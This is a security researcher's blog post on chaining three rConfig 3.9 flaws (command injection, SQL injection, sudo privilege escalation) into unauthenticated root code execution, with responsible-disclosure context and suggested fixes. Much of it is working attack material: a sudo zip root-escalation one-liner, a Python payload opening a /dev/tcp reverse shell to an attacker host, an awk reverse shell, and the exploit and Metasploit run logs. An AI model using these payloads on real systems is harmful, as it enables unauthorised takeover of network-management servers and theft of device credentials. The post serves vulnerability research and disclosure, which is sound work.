Rconfig - From zero to (root)shell

Rconfig - From zero to (root)shell

Looking at the Rconfig 3.9 source code lead to find several security bugs which can be chained in order to get unauthenticated (root) remote code execution.


While I was preparing OSCE exam I decided to “take a break” (temporarily stop using debuggers and doing some web exploit). Regarding this web application, here is the project summary :

rConfig is an open source network device configuration management utility for network engineers to take frequent configuration snapshots of their network devices.

Looking at the Rconfig web page, it seems this network management is used by many customers (probably more on internal networks than Internet).

Rconfig website

I can’t tell it was a code audit, my approach was more a “quick and dirty” security evaluation but it gave some interesting results…

CVE-2019-19509 : authenticated RCE

I always remember that grep is a good friend when looking at source code. Rconfig is a PHP web application so I looked for interesting functions :

  $ git clone
  $ cd rconfig
  $ grep -Hira 'exec\|passthru\|popen\|proc_open\|shell_exec\|system\|call_user_func'  .

Rconfig rce grep

I notice that several command execution functions are used and I focus on the www/lib/ajaxHandlers/ directory because the web pages can be reached directly by a web client request. Maybe those variables can be controlled somehow by an attacker ? Yes it is ! By looking at the ajaxArchiveFiles.php page, I can see that once authenticated, I can play with the path value.

Rconfig rce source

Please note the command being executed : sudo -u apache zip (we will use this detail later). Well it’s time to make a PoC about this, doing the universal ping command.

Rconfig rce source Rconfig rce source

I sent all those details to Stephen (Rconfig project leader), suggesting the following fix :

  $ diff ajaxArchiveFiles.php ajaxArchiveFiles.php.fix 
  <     $mainPath = $_GET['path'];
  >     $mainPath = escapeshellarg($_GET['path']);
  <     $ext = "*." . $_GET['ext'];
  >     $ext = "*." . escapeshellarg($_GET['ext']);

I published a PoC allowing to compromise easily targets. The source code is also available on Exploit DB.

CVE-2019-19585 : Local Privilege Escalation (root)

This vulnerability was found using my big grep skills again. In the previous chapter I found the RCE but validating it needs me to install the Rconfig using the official manual.

Rconfig rce source

I wanted to know how the application is installed : in the above script, I noticed the final install script I wanted to look at :

  $ grep curl 
  curl -O -A "Mozilla"  >> $LOGFILE 2>&1
  curl -O -A "Mozilla" >> $LOGFILE 2>&1

My conclusion was : ok, in the default install I can get root if I have a web shell, that is, a shell running with apache user rights. Hmmm. Let’s test it with the RCE I already have ! There are so many ways to elevate your privileges on Linux that I had to choose the right one : I decided to use the zip technique because I know that rConfig use it (cf. the chapter above) so I can expect this binary to be installed on the target.

  bash-4.2$ touch /tmp/LPE.txt
  bash-4.2$ sudo zip -q /tmp/ /tmp/LPE.txt -T -TT '/bin/sh #'
  bash-4.2# id
  bash-4.2# uid=0(root) gid=48(apache) groups=48(apache)

I contacted Stephen again, suggesting the following options :

  • Option 1 : adjust permissions on files / directories in order to make apache able to handle it
  • Option 2 : remove apache related configuration from /etc/sudoers file
  • Option 3 : Use capabilities
  chown "${USER}" "${BINPATH} " 
  chmod 0500 "${BINPATH} " 
  setcap CAP_DAC_OVERRIDE=+ep "${BINPATH}"

As usual PoC or GTFO, I published some examples (zip, crontab, chmod…) to elevate to root when you used the previous RCE vulnerability.

CVE-2020-10220 : unauthenticated SQLi

Here I am : I can get a shell and elevate to root but I need to be authenticated :-(

Frustrating isn’t it ?

Why not spending some additional efforts to bypass this constraint ? Huge grep skills back again (hahaha) : I filtered out all pages where authentication checks are done then I focused on functions reachable without authentication. There are many ways to bypass authentication in a webapp, but while I was reading Rconfig source code I noticed that point in the : several parameters can be used to inject SQL, I choosed the searchColumn one because it is controlled (client side), and is used without any filter in the following SQL query.

Rconfig rce source

Keep it simple, I used stacked queries to exploit this. I created a simple proof of concept (the source code is also available on Exploit DB) which extracts some data (login/password and network devices IP addresses) from the database.

  $ python3
  rconfig 3.9 - SQL Injection PoC
  [+] Triggering the payloads on
  [+] Extracting the current DB name :
  [+] Extracting 10 first users :
  Maybe no more information ?
  Maybe no more information ?
  [+] Extracting 10 first devices :
  Maybe no more information ?
  Maybe no more information ?

Exploit chaining aka “press Enter and get root”

Nothing new here but we can chain vulnerabilities to decrease difficulty of server compromise. Here is the plan :

  • Adding a temporary admin user (using SQLi)
  fake_user = generateUsername(10)
  fake_pass_md5 = "21232f297a57a5a743894a0e4a801fc3" # hash of 'admin'
  • Authenticating as this new admin and trigger the code execution (using RCE) and get root (using LPE)
  payload = ''' 
  `touch /tmp/.'''+fake_user+'''.txt;
  sudo zip -q /tmp/.'''+fake_user+'''.zip /tmp/.'''+fake_user+'''.txt -T -TT 
  '/bin/sh -i>& /dev/tcp/{0}/{1} 0>&1 #'` 
  '''.format(ip, port)

That’s it ! Here is an example on how to get a reverse rootshell :

  $ python3 3334
  rConfig - 3.9 - Unauthenticated root RCE
  [+] Adding a temporary admin user...
  [+] Authenticating as dywzxuvbah...
  [+] Logged in successfully, triggering the payload...
  [+] Check your listener !
  [+] The reverse shell seems to be opened :-)
  [+] Removing the temporary admin user...
  [+] Done.

  $ nc -nvlp 3334
  listening on [any] 3334 ...
  connect to [] from (UNKNOWN) [] 46186
  sh: no job control in this shell
  sh-4.2# id
  uid=0(root) gid=0(root) groups=0(root)

You can find the final exploit here or on Exploit DB.

Automate vulnerability check & exploit : developing a metasploit module

During engagments I sometime use Metasploit to automate / ease a task. I never coded a MSF module before, I thought it can be a good experience and be useful for automated tests.

I didn’t know Ruby language before and it was quite confused when starting at coding. Fortunatly the project has a very good documentation which explains how to start and provides enough templates. Writing a module is out of scope of this blogpost but here is some advices if you want to contribute :

  • RFTM
  • use the provided template
  • step back, think about all the situations and targets (OS, webservers, etc) your exploit will deal with
  • submit your pull request

For me the last point was a scary thing because you know, Metasploit is famous in offensive security world and I was in some doubt that I can submit a PR for this project. But I was positively surprised by the dev team (greetz to adfoster) : all comments and reviews are caring and my module was eventually merged in this tool.

  This module exploits multiple vulnerabilities in rConfig version 3.9 
  in order to execute arbitrary commands. This module takes advantage 
  of a command injection vulnerability in the `path` parameter of the 
  ajax archive file functionality within the rConfig web interface in 
  order to execute the payload. Valid credentials for a user with 
  administrative privileges are required. However, this module can 
  bypass authentication via SQLI. This module has been successfully 
  tested on Rconfig 3.9.3 and 3.9.4. The steps are: 1. SQLi on 
  / allows us to add an administrative user. 2. An 
  authenticated session is established with the newly added user 3. 
  Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows 
  us to execute the payload. 4. Remove the added admin user. Tips : 
  once you get a shell, look at the CVE-2019-19585. You will probably 
  get root because rConfig install script add Apache user to sudoers 
  with nopasswd ;-)

It works like a charm :-)

  resource (rconfig_final.rc)> use exploit/linux/http/rconfig_ajaxarchivefiles_rce
  resource (rconfig_final.rc)> set RHOSTS
  resource (rconfig_final.rc)> set RPORT 443
  resource (rconfig_final.rc)> set LHOST
  resource (rconfig_final.rc)> set LPORT 3333
  resource (rconfig_final.rc)> set verbose true
  resource (rconfig_final.rc)> exploit -j
  [*] Exploit running as background job 0.
  [*] Exploit completed, but no session was created.

  [*] Started reverse TCP handler on 
  msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce_final) > 
  [*] STEP 0: Get rConfig version...
  [*] rConfig version 3.9 detected
  [*] STEP 1 : Adding a temporary admin user...
  [+] New temporary user ElCWcNJhUId created
  [*] STEP 2: Authenticating as ElCWcNJhUId ...
  [+] Authenticated as user ElCWcNJhUId
  [*] STEP 3: Executing the command (awk 'BEGIN{s="/inet/tcp/0/";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit");close(s)}}')
  [*] Command shell session 1 opened ( -> at 2020-03-10 15:50:44 +0100
  [+] Command sucessfully executed
  [*] STEP 4 : Removing the temporary admin user...
  [*] User ElCWcNJhUId removed successfully !

  msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce_final) > sessions -i 1
  [*] Starting interaction with 1...

  uid=48(apache) gid=48(apache) groups=48(apache)

The module is already shipped with Metasploit (you can search rconfig or directly use exploit/linux/http/rconfig_ajaxarchivefiles_rce ) but if needed the source code can be downloaded from my github MSF-POC or from Exploit DB.


This post aimed at explaining how chaining vulnerabilities can be useful. When I started this bug hunt I didn’t expect such results, it was both fun and quite challenging : that’s I love in infosec :-)

If you’re interested in hunting vulnerabilities in a web application, I higly recommends the methodology clearly explained by a friend of mine, H4knet, who shared how he found several vulnerabilities in EyesOfNetwork. I also recommend the great post of Guly about other Rconfig vulnerabilities : he gives you many details on his hunting flow, helping to understand the useful mindset needed to find vulnerabilities.

Thanks for reading this, feel free to comment or contact me :-)

viking logo
Author : Viking
Blog author, follow me on twitter